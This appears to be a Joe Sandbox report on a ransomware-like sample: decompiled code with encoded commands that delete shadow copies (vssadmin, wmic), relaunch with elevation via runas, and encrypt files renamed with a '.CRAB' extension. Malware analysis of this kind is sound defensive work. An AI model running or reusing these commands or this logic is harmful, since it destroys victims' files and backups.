				 *(_t476 + 0x68) = _t331;
				_t333 = _a4 ^ _v8;
				 *(_t476 + 0x6c) = _t333;
				_a4 = _t333;
				_t341 = _a8;
				_t546 = _t545 ^  *(0xf69be40 + (_t333 >> 0x18) * 4) ^  *(0xf69ba40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69b240 + (_a4 & 0x000000ff) * 4);
				_t564 = _t563 ^ _t546;
				_t556 = _t555 ^ _t564;
				_t424 = _t423 ^ _t556;
				 *(_t341 + 0x70) = _t546;
				 *(_t341 + 0x74) = _t564;
				 *(_t341 + 0x78) = _t556;
				 *(_t341 + 0x7c) = _t424;
				_t350 = _v12 ^  *(0xf69ba40 + (_t424 >> 0x18) * 4) ^  *(0xf69b640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t424 & 0x000000ff) * 4) ^  *0xf69a20c;
				_v12 = _t350;
				 *(_a8 + 0x80) = _t350;
				_t492 = _v16 ^ _t350;
				_v16 = _t492;
				 *(_a8 + 0x84) = _t492;
				_t353 = _v8 ^ _t492;
				_t493 = _a8;
				_v8 = _t353;
				 *(_t493 + 0x88) = _t353;
				_t355 = _a4 ^ _v8;
				 *(_t493 + 0x8c) = _t355;
				_a4 = _t355;
				_t363 = _a8;
				_t547 = _t546 ^  *(0xf69be40 + (_t355 >> 0x18) * 4) ^  *(0xf69ba40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69b240 + (_a4 & 0x000000ff) * 4);
				_t565 = _t564 ^ _t547;
				_t557 = _t556 ^ _t565;
				 *(_t363 + 0x90) = _t547;
				 *(_t363 + 0x94) = _t565;
				 *(_t363 + 0x98) = _t557;
				_t425 = _t424 ^ _t557;
				 *(_t363 + 0x9c) = _t425;
				_t372 = _v12 ^  *(0xf69ba40 + (_t425 >> 0x18) * 4) ^  *(0xf69b640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t425 & 0x000000ff) * 4) ^  *0xf69a210;
				_v12 = _t372;
				 *(_a8 + 0xa0) = _t372;
				_t509 = _v16 ^ _t372;
				_v16 = _t509;
				 *(_a8 + 0xa4) = _t509;
				_t375 = _v8 ^ _t509;
				_t510 = _a8;
				_v8 = _t375;
				 *(_t510 + 0xa8) = _t375;
				_t377 = _a4 ^ _v8;
				 *(_t510 + 0xac) = _t377;
				_a4 = _t377;
				_t385 = _a8;
				_t548 = _t547 ^  *(0xf69be40 + (_t377 >> 0x18) * 4) ^  *(0xf69ba40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69b240 + (_a4 & 0x000000ff) * 4);
				_t566 = _t565 ^ _t548;
				_t558 = _t557 ^ _t566;
				_t426 = _t425 ^ _t558;
				 *(_t385 + 0xb0) = _t548;
				 *(_t385 + 0xb4) = _t566;
				 *(_t385 + 0xb8) = _t558;
				 *(_t385 + 0xbc) = _t426;
				_t394 = _v12 ^  *(0xf69ba40 + (_t426 >> 0x18) * 4) ^  *(0xf69b640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t426 & 0x000000ff) * 4) ^  *0xf69a214;
				_v12 = _t394;
				 *(_a8 + 0xc0) = _t394;
				_t526 = _v16 ^ _t394;
				_v16 = _t526;
				 *(_a8 + 0xc4) = _t526;
				_t397 = _v8 ^ _t526;
				_t527 = _a8;
				_v8 = _t397;
				 *(_t527 + 0xc8) = _t397;
				_t399 = _a4 ^ _v8;
				 *(_t527 + 0xcc) = _t399;
				_a4 = _t399;
				_t407 = _a8;
				_t549 = _t548 ^  *(0xf69be40 + (_t399 >> 0x18) * 4) ^  *(0xf69ba40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69b240 + (_a4 & 0x000000ff) * 4);
				_t567 = _t566 ^ _t549;
				_t559 = _t558 ^ _t567;
				_t427 = _t426 ^ _t559;
				 *(_t407 + 0xd4) = _t567;
				_t568 = _t407;
				 *(_t407 + 0xd0) = _t549;
				 *(_t568 + 0xd8) = _t559;
				 *(_t568 + 0xdc) = _t427;
				_t416 = _v12 ^  *(0xf69ba40 + (_t427 >> 0x18) * 4) ^  *(0xf69b640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t427 & 0x000000ff) * 4) ^  *0xf69a218;
				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
				_t542 = _v16 ^ _t416;
				 *(_t568 + 0xe0) = _t416;
				_t551 = _v8 ^ _t542;
				 *(_t568 + 0xe4) = _t542;
				 *(_t568 + 0xec) = _a4 ^ _t551;
				 *(_t568 + 0xe8) = _t551;
				 *((char*)(_t568 + 0xf0)) = 0xe0;
				return 0;
			}

0x0f698526
0x0f69852a
0x0f69852e
0x0f698530
0x0f698533
0x0f698535
0x0f698538
0x0f69853b
0x0f69853e
0x0f698541
0x0f698544
0x0f698547
0x0f69854a
0x0f69854d
0x0f698550
0x0f698553
0x0f698556
0x0f698559
0x0f69855d
0x0f698560
0x0f698563
0x0f69856e
0x0f6985a9
0x0f6985ae
0x0f6985b1
0x0f6985b7
0x0f6985bc
0x0f6985bf
0x0f6985c5
0x0f6985c7
0x0f6985ca
0x0f6985cd
0x0f6985d3
0x0f6985d6
0x0f6985db
0x0f698612
0x0f698615
0x0f698617
0x0f698619
0x0f69861b
0x0f69861d
0x0f698620
0x0f698623
0x0f698626
0x0f698666
0x0f69866b
0x0f69866e
0x0f698674
0x0f698679
0x0f69867c
0x0f698682
0x0f698684
0x0f698687
0x0f69868a
0x0f698690
0x0f698693
0x0f698698
0x0f6986cf
0x0f6986d2
0x0f6986d4
0x0f6986d6
0x0f6986d8
0x0f6986da
0x0f6986df
0x0f6986e2
0x0f6986e5
0x0f698723
0x0f698728
0x0f69872b
0x0f698731
0x0f698736
0x0f698739
0x0f69873f
0x0f698741
0x0f698744
0x0f698747
0x0f69874d
0x0f698750
0x0f698755
0x0f69878c
0x0f69878f
0x0f698791
0x0f698793
0x0f698795
0x0f698797
0x0f69879c
0x0f69879f
0x0f6987a2
0x0f6987e0
0x0f6987e5
0x0f6987e8
0x0f6987f1
0x0f6987f6
0x0f6987f9
0x0f698802
0x0f698804
0x0f698807
0x0f69880a
0x0f698813
0x0f698816
0x0f69881e
0x0f698855
0x0f698858
0x0f69885a
0x0f69885c
0x0f69885e
0x0f698864
0x0f69886a
0x0f698870
0x0f698872
0x0f6988b5
0x0f6988ba
0x0f6988bd
0x0f6988c6
0x0f6988cb
0x0f6988ce
0x0f6988d7
0x0f6988d9
0x0f6988dc
0x0f6988df
0x0f6988e8
0x0f6988eb
0x0f6988f3
0x0f69892a
0x0f69892d
0x0f69892f
0x0f698931
0x0f698933
0x0f698935
0x0f69893d
0x0f698943
0x0f698949
0x0f69898a
0x0f69898f
0x0f698992
0x0f69899b
0x0f6989a0
0x0f6989a3
0x0f6989ac
0x0f6989ae
0x0f6989b1
0x0f6989b4
0x0f6989bd
0x0f6989c0
0x0f6989c8
0x0f6989ff
0x0f698a02
0x0f698a04
0x0f698a06
0x0f698a08
0x0f698a0a
0x0f698a12
0x0f698a14
0x0f698a25
0x0f698a2b
0x0f698a65
0x0f698a67
0x0f698a74
0x0f698a76
0x0f698a7f
0x0f698a83
0x0f698a89
0x0f698a91
0x0f698a97
0x0f698aa3

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081fb179ab29082f40ff478ccbfac76273229dee1323747b866d3f3e7e1aec2f
Instruction ID: 8e1df4ace9046d4dd1a90d32ae05e9f2073eea04a0832e84dba5159bd92b3aa8
Opcode Fuzzy Hash: 081fb179ab29082f40ff478ccbfac76273229dee1323747b866d3f3e7e1aec2f
Instruction Fuzzy Hash: 7F12E970A141189FCB48CF69E49097AB7F5FB8D311B4280AEE91ADB381CB35AA51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0F695FF0 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
Instruction ID: f5419b07c4ed411fd37a21da85eb28fe43cf4117d1aa85c40636e72d95176acc
Opcode Fuzzy Hash: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
Instruction Fuzzy Hash: FDD18B71A043168FCF24CF58C990BAAB7B9FF48314F6941A9D855AB342D736F952CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0F6945B0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F6945B0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0F693CF0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x0f6945c6
0x0f694662
0x0f69466c
0x0f694674
0x0f69467c
0x0f694680
0x0f694688
0x0f69468c
0x0f694694
0x0f694699
0x0f6946a1
0x0f6946a9
0x0f6946b1
0x0f6946b9
0x0f6946c1
0x0f6946c9
0x0f6946d4
0x0f6946df
0x0f6946ea
0x0f6946f5
0x0f694700
0x0f69470b
0x0f694716
0x0f694721
0x0f69472c
0x0f694737
0x0f694742
0x0f69474d
0x0f6945cc
0x0f6945ce
0x0f6945d6
0x0f6945de
0x0f6945e2
0x0f6945ea
0x0f6945ee
0x0f6945f6
0x0f6945fe
0x0f694606
0x0f69460e
0x0f694613
0x0f69461b
0x0f694623
0x0f69462b
0x0f694633
0x0f69463b
0x0f694643
0x0f69464b
0x0f694653
0x0f694653
0x0f694766
0x0f694775
0x0f694779
0x0f694785
0x0f69478d
0x0f6947a3
0x0f6947ab
0x0f6947ad
0x0f69477b
0x0f69477b
0x0f69477b
0x0f6947b7
0x0f6947c5

APIs

Part of subcall function 0F693CF0: _memset.LIBCMT ref: 0F693D42
Part of subcall function 0F693CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F693D66
Part of subcall function 0F693CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F693D6A
Part of subcall function 0F693CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F693D6E
Part of subcall function 0F693CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F693D95

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F69476F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F694785
lstrcatW.KERNEL32(00000000,0063005C), ref: 0F69478D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F6947A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F6947B7

Strings

d, xrefs: 0F694700
s, xrefs: 0F694613
a, xrefs: 0F6946B1
/, xrefs: 0F694737
m, xrefs: 0F6946B9
n, xrefs: 0F6946C1
x, xrefs: 0F694606
\, xrefs: 0F694662
d, xrefs: 0F6946C9
l, xrefs: 0F6946D4
w, xrefs: 0F69470B
b, xrefs: 0F6945D6
e, xrefs: 0F694643
m, xrefs: 0F69466C
h, xrefs: 0F6946F5
p, xrefs: 0F694633
, xrefs: 0F6946EA
, xrefs: 0F6946A1
open, xrefs: 0F69479C
., xrefs: 0F6945FE
i, xrefs: 0F6945F6
, xrefs: 0F69463B
e, xrefs: 0F694653
s, xrefs: 0F6946A9
e, xrefs: 0F69474D
a, xrefs: 0F69461B
c, xrefs: 0F69462B
e, xrefs: 0F69464B
o, xrefs: 0F694623
a, xrefs: 0F694721
l, xrefs: 0F69472C
u, xrefs: 0F694742
, xrefs: 0F694716
w, xrefs: 0F6945EE
m, xrefs: 0F6945E2
/, xrefs: 0F694699
\, xrefs: 0F6945CE
x, xrefs: 0F69468C
t, xrefs: 0F6946DF
., xrefs: 0F694680

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 25dc9456bea9861e5ac26269c99861dd88aaf4b29d56234967e1443de7137601
Instruction ID: 73bf6537f745ab71aa5ece1682e934ad262fedb8b518c2d34047a99e847157e8
Opcode Fuzzy Hash: 25dc9456bea9861e5ac26269c99861dd88aaf4b29d56234967e1443de7137601
Instruction Fuzzy Hash: 8D4106B014C380DEE3208F219849B5BBEE6FB85B59F10491CE6985A291C7F6854CCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0F693DB0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F693DB0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0F693CF0(__edx);
				if(_t54 != 0) {
					_t54 = E0F693C70();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x0f693dbf
0x0f693dc1
0x0f693dc8
0x0f693dce
0x0f693dd5
0x0f693de7
0x0f693df4
0x0f693dfd
0x0f693e05
0x0f693e0d
0x0f693e15
0x0f693e1d
0x0f693e25
0x0f693e2d
0x0f693e35
0x0f693e3d
0x0f693e45
0x0f693e4d
0x0f693e55
0x0f693e5d
0x0f693e68
0x0f693e78
0x0f693e81
0x0f693e89
0x0f693e91
0x0f693e99
0x0f693ea1
0x0f693ea9
0x0f693eb1
0x0f693eb9
0x0f693ec4
0x0f693ecf
0x0f693eda
0x0f693ee5
0x0f693ef0
0x0f693efb
0x0f693f06
0x0f693f11
0x0f693f1c
0x0f693f27
0x0f693f41
0x0f693f43
0x0f693f49
0x0f693f50
0x0f693f5c
0x0f693f5e
0x0f693f65
0x0f693f6d
0x0f693f75
0x0f693f7d
0x0f693f87
0x0f693f91
0x0f693f94
0x0f693f9b
0x0f693fa2
0x0f693fb0
0x0f693fb1
0x0f693fb5
0x00000000
0x00000000
0x0f693fb7
0x0f693fbb
0x00000000
0x00000000
0x0f693fc4
0x00000000
0x0f693fc4
0x0f693fd6
0x0f693fdf
0x0f693fe7
0x0f693fe7
0x0f693dd5
0x0f693fca
0x0f693fd0

APIs

Part of subcall function 0F693CF0: _memset.LIBCMT ref: 0F693D42
Part of subcall function 0F693CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F693D66
Part of subcall function 0F693CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F693D6A
Part of subcall function 0F693CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F693D6E
Part of subcall function 0F693CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F693D95

Part of subcall function 0F693C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F693CA0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F693E5D
wsprintfW.USER32 ref: 0F693F27
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F693F3B
GetForegroundWindow.USER32 ref: 0F693F50
ShellExecuteExW.SHELL32(00000000), ref: 0F693FB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F693FC4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F693FD6
CloseHandle.KERNEL32(?), ref: 0F693FDF
ExitProcess.KERNEL32 ref: 0F693FE7

Strings

c, xrefs: 0F693E91
e, xrefs: 0F693E81
w, xrefs: 0F693E35
c, xrefs: 0F693E55
c, xrefs: 0F693EE5
n, xrefs: 0F693F6D
", xrefs: 0F693F1C
a, xrefs: 0F693EFB
a, xrefs: 0F693EB1
o, xrefs: 0F693E78
r, xrefs: 0F693F65
, xrefs: 0F693EDA
p, xrefs: 0F693E68
s, xrefs: 0F693E89
d, xrefs: 0F693DFD
", xrefs: 0F693EC4
s, xrefs: 0F693EF0
y, xrefs: 0F693E15
r, xrefs: 0F693EA9
%, xrefs: 0F693DE7
%, xrefs: 0F693F11
m, xrefs: 0F693ECF
t, xrefs: 0F693E1D
2, xrefs: 0F693E2D
\, xrefs: 0F693E45
m, xrefs: 0F693E25
, xrefs: 0F693EA1
e, xrefs: 0F693EB9
t, xrefs: 0F693F06
s, xrefs: 0F693F75
\, xrefs: 0F693E0D
e, xrefs: 0F693E3D
i, xrefs: 0F693DF4
r, xrefs: 0F693E05
l, xrefs: 0F693E99

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: 26e6a4d312fab6a9f12b9eca5c5b7e3975e184f78941bb24a6b6cebc247babfa
Instruction ID: 792ee6b87207c6e18f8196dff22468774c6369b0511de1d65564babfeea87ecc
Opcode Fuzzy Hash: 26e6a4d312fab6a9f12b9eca5c5b7e3975e184f78941bb24a6b6cebc247babfa
Instruction Fuzzy Hash: 2F5157B0008341DFE7208F51D448B9ABFF9FF84759F004A1DE6988A251D7FA9168CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0F6937B0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0F6937B0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0F696500(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x43002e;
				_v56 = _t162;
				_v76 = 0x410052;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xf6a0530]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xf6a0530]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xf6a0530]");
				asm("movdqu [ebp-0x64], xmm0");
				E0F698400( &_v104, 0x10);
				E0F698400( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0F696660(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0F696660(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0F698520( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
